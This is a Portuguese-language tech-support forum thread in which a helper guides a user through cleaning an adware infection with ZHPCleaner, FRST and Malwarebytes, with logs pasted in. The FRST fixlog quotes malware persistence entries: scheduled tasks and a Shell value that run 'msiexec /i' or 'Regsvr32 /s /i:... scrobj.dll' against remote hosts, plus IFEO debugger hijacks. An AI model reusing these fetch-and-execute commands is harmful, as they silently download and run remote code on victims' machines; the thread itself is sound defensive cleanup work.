MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{EF70F58D-8515-4979-B7AA-ADDEF80F7CF4}.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{FB245ED0-CD60-4B9C-9EB2-CDB63D189087}ae_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Windows\SECOH-QAD.exe    =>HackTool.KMSpico
MOVIDO arquivo: C:\Program Files (x86)\Elex-tech  =>.Superfluous.Elex
MOVIDO arquivo: C:\Program Files\KMSpico  =>HackTool.KMSpico
MOVIDO arquivo: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico  =>HackTool.KMSpico
MOVIDO arquivo: C:\Users\AnjiN\Music\Romantic Cello Favorites (David Popper) (1992) (Janos Starker, Shigeo Neriki)  =>PUP.Optional.Vonteera
MOVIDO arquivo: C:\Program Files (x86)\QuickTime  =>Riskware.QuickTime
MOVIDO arquivo: C:\Program Files (x86)\Elex-tech\YAC  =>.Superfluous.YetAnotherCleaner
MOVIDO arquivo: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime  =>Riskware.QuickTime
MOVIDO arquivo: C:\Windows\Installer\MSI14FD.tmp-  =>.Superfluous.Empty
MOVIDO arquivo: C:\Windows\Installer\MSI3D4.tmp-  =>.Superfluous.Empty
MOVIDO arquivo: C:\Windows\Installer\MSI3F79.tmp-  =>.Superfluous.Empty
MOVIDO arquivo: C:\Windows\Installer\MSI4354.tmp-  =>.Superfluous.Empty
MOVIDO arquivo: C:\Windows\Installer\MSI7DC.tmp-  =>.Superfluous.Empty
MOVIDO arquivo: C:\Windows\Installer\MSI9EC2.tmp-  =>.Superfluous.Empty
MOVIDO arquivo: C:\Windows\Installer\MSIBB10.tmp-  =>.Superfluous.Empty
MOVIDO arquivo: C:\Windows\Installer\MSIBE93.tmp-  =>.Superfluous.Empty
MOVIDO arquivo: C:\Windows\Installer\MSIBF18.tmp-  =>.Superfluous.Empty
MOVIDO arquivo: C:\Users\AnjiN\AppData\Local\Temp\chrome_BITS_9892_32197  =>.Superfluous.Empty


---\\  Registro ( Chaves, Valores, Dados ) (9)
SUPRIMIDO dados: HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{06b710c1-e376-4818-977e-59286e925d61}\\DhcpNameServer [Bad : 201.21.192.168 201.21.192.122]  =>Hijacker.Browser
SUPRIMIDO dados: HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\\DhcpNameServer [Bad : 201.21.192.168 201.21.192.122]  =>Hijacker.Browser
SUPRIMIDO chave*: HKLM\SYSTEM\CurrentControlSet\Services\Service KMSELDI [C:\Program Files\KMSpico\Service_KMS.exe (Not File)]  =>HackTool.KMSpico
SUPRIMIDO chave*: HKLM\SOFTWARE\Wow6432Node\Firefox []  =>Adware.GhokswaBrowser
SUPRIMIDO chave: HKLM\SOFTWARE\Firefox []  =>Adware.GhokswaBrowser
SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B29D47F-92E2-4C20-9EE0-F710991F5D7C}_is1 [KMSpico]  =>HackTool.KMSpico
SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02274F1D2E6A9F8449FE4DD52EFC967F [C:\ProgramData\Ableton\Live 9 Suite\Resources\Python\abl.webconnector\abl\webconnector\auto_updates.py]  =>Adware.Sambreel
SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Wow6432Node\Elex-tech []  =>.Superfluous.Elex
SUPRIMIDO chave*: [X64] HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\iSafe [ELEX DO BRASIL PARTICIPAÇÕES LTDA]  =>.Superfluous.Elex


---\\  Resumo dos elementos encontrados na sua estação de trabalho (12)
https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.Empty
https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.Temporary.Empty
https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.Temporary
https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.Temporary.Various
https://nicolascoolman.eu/2017/02/16/hacktool-kmspico/  =>HackTool.KMSpico
https://nicolascoolman.eu/2017/03/28/superfluous-elex/  =>.Superfluous.Elex
https://www.nicolascoolman.com/fr/trojan-vonteera/  =>PUP.Optional.Vonteera
https://nicolascoolman.eu/2017/01/15/riskware-quicktime/  =>Riskware.QuickTime
https://nicolascoolman.eu/2017/01/20/logiciels-superflus/  =>.Superfluous.YetAnotherCleaner
https://nicolascoolman.eu/2017/02/02/hijacker-browser-2/  =>Hijacker.Browser
https://nicolascoolman.eu/2017/02/19/adware-ghokswabrowser/  =>Adware.GhokswaBrowser
https://www.nicolascoolman.com/fr/pup-optional-sambreel/  =>Adware.Sambreel


---\\  Dodatkowe oczyszczenie. (22)
~ Chave de registro Tracing Supprimido (22)
~ Remover os relatórios antigos ZHPCleaner. (0)


---\\ Resultado de reparação
Reparação efectuada com sucesso
~ Este navegador está faltando ! (Mozilla Firefox)
~ Este navegador está faltando ! (Opera Software)


---\\ Estatísticas
~ Items scan : 539
~ Items encontrado : 0
~ items cancelados : 0
~ Items réparo : 128


~ End of clean in 00h00mn43s
~====================
ZHPCleaner-[R]-12052017-22_31_56.txt
ZHPCleaner-[S]-12052017-22_20_48.txt
ZHPCleaner-[S]-12052017-22_28_14.txt

 

 

 

No aguardo!

 

Grato!

 

Editado por Thiago Anjin

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro @Thiago Anjin

 

Por favor, não coloque os logs entre TAGS, obrigado!

 

Desative temporariamente seu antivírus, antispywares e firewall, para não causar conflitos.

 

Baixe o Farbar Recovery Scan Tool e salve-o na Área de Trabalho (Desktop).


32 bit (x86) ou 64 bit (x64)

 

  • Clique duas vezes para executar a ferramenta.
    • Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png
  • Marque a caixa Arquivos 90 dias,  e clique no botão Examinar.
  • Aguarde e ao final os logs FRST.txt e Addition.txt serão salvos em sua Área de Trabalho (Desktop).
  • Selecione, copie e cole o conteúdo do log  FRST.txt em sua próxima resposta.
  • Anexe o log Addition.txt

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá, @diego_moicano! Perdão pela forma incorreta de enviar os logs. Eu estou tentando colar o log aqui, mas não envia. Talvez seja o tamanho do texto colado. Tento visualizar e o seguinte erro aparece:
 

Citação


"Fatal error: Maximum execution time of 30 seconds exceeded in /www/invision/system/Text/Parser.php on line 899"

 

 

Vou anexar o FRST.txt também, daí vai! Juro que tentei várias vezes responder o post com o log colado aqui no corpo da mensagem, mas não obtive sucesso!

 

 

Addition.txt em anexo!

 

Grato!

Addition.txt

FRST.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites

Amigo sem problemas... se for melhor anexar os logs, tudo ok! ;)

 

Por acaso você instalou o Chrome neste local?

 

C:\Program Files (x86)\Bagsarah\Application\chrome.exe

 

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Não instalei.. 

 

Enquanto tentava colar o log, li este caminho ai, e achei muito estranho. 

 

Pelo visto, Everness é apenas uma das faces desse malware...

 

 

Abraço!

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro @Thiago Anjin

 

>>> Desinstale totalmente o Chrome.

 

Desative temporariamente seu antivírus, antispywares e firewall, para não causar conflitos.

 

Baixe o arquivo (fixlist.txt) no anexo deste post e salve-o na Área de Trabalho (Desktop).

Execute o FRST.exe (ou FRST64.exe) e clique no botão Corrigir.

Aguarde... ao final será gerado o log Fixlog.txt  salvo em sua Área de Trabalho (Desktop).

Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

 

Abraços :D

fixlist.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá, caro @diego_moicano!

 

Removi o Chrome através do painel de controle, e em seguida realizei os passos seguintes. Aí segue o log:

 

=============

 

Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 14-05-2017
Executado por AnjiN (19-05-2017 22:13:48) Run:1
Executando a partir de C:\Users\AnjiN\Desktop
Perfis Carregados: AnjiN (Perfis Disponíveis: defaultuser0 & AnjiN)
Modo da Inicialização: Normal
==============================================

fixlist Conteúdo:
*****************
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1706358801-989810220-3475375959-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj88NUMcMTw3FUY2NYI5RUUxM8M4MkFyFkQYRYJQN8E2Fc== /q
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
SearchScopes: HKU\S-1-5-21-1706358801-989810220-3475375959-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
HKU\S-1-5-21-1706358801-989810220-3475375959-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
U2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [103064 2017-05-10] () <==== ATENÇÃO
S3 dbx; system32\DRIVERS\dbx.sys [X]
S1 gbpddfac; system32\drivers\gbpddfac64.sys [X]
S0 gbpddreg; system32\drivers\gbpddreg64.sys [X]
2017-02-16 01:25 - 2017-02-16 01:25 - 49239544 _____ (Sony) C:\Users\AnjiN\AppData\Local\Temp\xcs8E7C.tmp.exe
Task: {CB06D178-DC95-422F-832C-57E742D2BB04} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {5197D388-7E9A-44FD-A91C-B1025514E493} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj88NUMcMTw3FUY2NYI5RUUxM8M4MkFyFkQYRYJQN8E2Fc== scrobj.dll
Task: {D14CF6DE-02E9-4E16-955D-F8F13A0FFA51} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj88NUMcMTw3FUY2NYI5RUUxM8M4MkFyFkQYRYJQN8E2Fc== scrobj.dll
CMD: ipconfig /flushdns
EmptyTemp:

*****************

Ponto de Restauração criado com sucesso.
Processos fechados com sucesso.
HKU\S-1-5-21-1706358801-989810220-3475375959-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valor removido (a) com sucesso.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => chave removido (a) com sucesso.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => chave removido (a) com sucesso.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => chave removido (a) com sucesso.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => chave removido (a) com sucesso.
HKU\S-1-5-21-1706358801-989810220-3475375959-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor removido (a) com sucesso.
HKU\S-1-5-21-1706358801-989810220-3475375959-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => chave removido (a) com sucesso.
HKLM\System\CurrentControlSet\Services\FirefoxU => chave removido (a) com sucesso.
FirefoxU => serviço removido (a) com sucesso.
HKLM\System\CurrentControlSet\Services\dbx => chave removido (a) com sucesso.
dbx => serviço removido (a) com sucesso.
HKLM\System\CurrentControlSet\Services\gbpddfac => chave removido (a) com sucesso.
gbpddfac => serviço removido (a) com sucesso.
HKLM\System\CurrentControlSet\Services\gbpddreg => chave removido (a) com sucesso.
gbpddreg => serviço removido (a) com sucesso.
C:\Users\AnjiN\AppData\Local\Temp\xcs8E7C.tmp.exe => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CB06D178-DC95-422F-832C-57E742D2BB04} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB06D178-DC95-422F-832C-57E742D2BB04} => chave removido (a) com sucesso.
C:\Windows\System32\Tasks\T0528 => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\T0528 => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5197D388-7E9A-44FD-A91C-B1025514E493} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5197D388-7E9A-44FD-A91C-B1025514E493} => chave removido (a) com sucesso.
C:\Windows\System32\Tasks\PowerWord-SCT-JT => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D14CF6DE-02E9-4E16-955D-F8F13A0FFA51} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D14CF6DE-02E9-4E16-955D-F8F13A0FFA51} => chave removido (a) com sucesso.
C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => chave removido (a) com sucesso.

========= ipconfig /flushdns =========


Configura‡Æo de IP do Windows

Libera‡Æo do Cache do DNS Resolver bem-sucedida.

========= Fim de CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 302969 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 156036319 B
Java, Flash, Steam htmlcache => 1008 B
Windows/system/drivers => 306951038 B
Edge => 83520623 B
Chrome => 128605935 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 2431 B
systemprofile32 => 128 B
LocalService => 30472 B
NetworkService => 83866 B
defaultuser0 => 7296 B
AnjiN => 1117195497 B

RecycleBin => 925629295 B
EmptyTemp: => 2.5 GB de dados temporários Removidos.

================================


O sistema precisou ser reiniciado.

==== Fim de Fixlog 22:16:19 ====

 

 

Após reiniciar, notei que o ícone do chrome permanecia no computador, ainda endereçado no caminho

 

C:\Program Files (x86)\Bagsarah\Application\chrome.exe

 

Também notei (isso anteriormente já tinha) atalhos de internet "criados" na minha área de trabalho, com ícones e títulos de Casas Bahia, Americanas e Ponto Frio. Abrindo as propriedades dos atalhos, os seguintes endereços em cada um:

 

- "C:\Program Files (x86)\Bagsarah\Application\chrome.exe" http://hohosearch.com/?uid=1234#red=aHR0cDovL2FkLnphbm94LmNvbS9wcGMvPzMwMjkwOTg3QzI4MTIyOTMxMVQ="

(iniciar em "C:\Program Files (x86)\Bagsarah\Application")

 

- "C:\Program Files (x86)\Everness\Application\chrome.exe" http://ad.zanox.com/ppc/?28341281C23251407T (iniciar em "C:\Program Files (x86)\Everness\Application")

 

- "C:\Program Files (x86)\Bagsarah\Application\chrome.exe" http://compre.você/v2/1248175c752 (iniciar em "C:\Program Files (x86)\Bagsarah\Application")

 

Peço perdão se enviei informações fora de contexto, mas achei interessante acrescentar!

 

Grato!

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro @Thiago Anjin

 

Está ótimo! :)

 

Baixe a Malwarebytes Anti-Malware (MBAM).
 
Clique duas vezes no mbam-setup.exe para instalar o programa.

  • Desmarque a caixa Ativar trial gratuito do MalwareBytes Anti-Malware PRO.
  • Se houver atualizações a serem feitas, serão baixadas e instaladas..
  • Clique em Configurações, clique em Detecção e proteção, marque Verificar por Rootkits.
  • Volte ao Painel e por fim clique em Verificar agora.
  • Começará então o exame. Aguarde, pois pode demorar.
  • Ao acabar o exame, se houver itens encontrados, certifique-se que estejam todas marcados e clique no botão Remover Selecionadas
  • Ao final da desinfecção, poderá aparecer um aviso se quer reiniciar o PC. (Ver Nota abaixo)
  • O log é automaticamente salvo pelo MBAM e para vê-lo, clique na aba Histórico -> Registros do aplicativo na janela principal do programa.
  • Clique duas vezes no log (Registro de verificação). Utilize o formato .txt para exportar o log.
  • O log de Proteção é desnecessário para a análise, exporte sempre o log correto.
  • Selecione, copie e cole o conteúdo deste log em sua próxima resposta.

 

NOTA: Se o MBAM encontrar arquivos que não consiga remover, poderá ter de reiniciar o PC (talvez mais de uma vez). Faça isso imediatamente, ao ser perguntado se quer reiniciar o PC.

 

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!


Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.


Entrar agora